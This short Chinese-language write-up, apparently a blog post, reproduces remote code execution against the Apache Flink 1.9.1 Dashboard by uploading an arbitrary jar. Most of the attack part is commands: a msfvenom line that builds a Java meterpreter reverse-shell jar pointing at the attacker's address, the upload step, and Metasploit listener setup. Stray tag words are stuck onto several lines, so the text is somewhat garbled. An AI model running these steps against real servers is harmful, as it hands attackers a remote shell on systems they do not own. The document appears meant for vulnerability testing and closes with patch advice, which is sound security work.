Flink核心是一個流式的數據流執行引擎,其針對數據流的分佈式計算提供了數據分佈、數據通訊以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分佈式任務。java
攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的。shell
至目前最新版本Apache Flink 1.9.1
漏洞危害: 高危apache
kali 192.168.115.43 受害機
win10 192.168.115.16 攻擊者
測試環境:Flink 1.9.1 java8+
Apache Flink 1.9.1安裝包下載tcp
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz分佈式
1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz
2)到bin文件夾運行./start-cluster.sh
3)環境搭建成功 目標站點 http://127.0.0.1:8081
測試
4)生成jar後門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar
lua
5)攻擊機訪問目標站點 並上傳sylon.jar
scala
6)配置監聽
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.115.16
set LPORT 2019
show options
run3d
7)漏洞觸發
blog
等待官網更新補丁或等待官網出最新版本後及時更新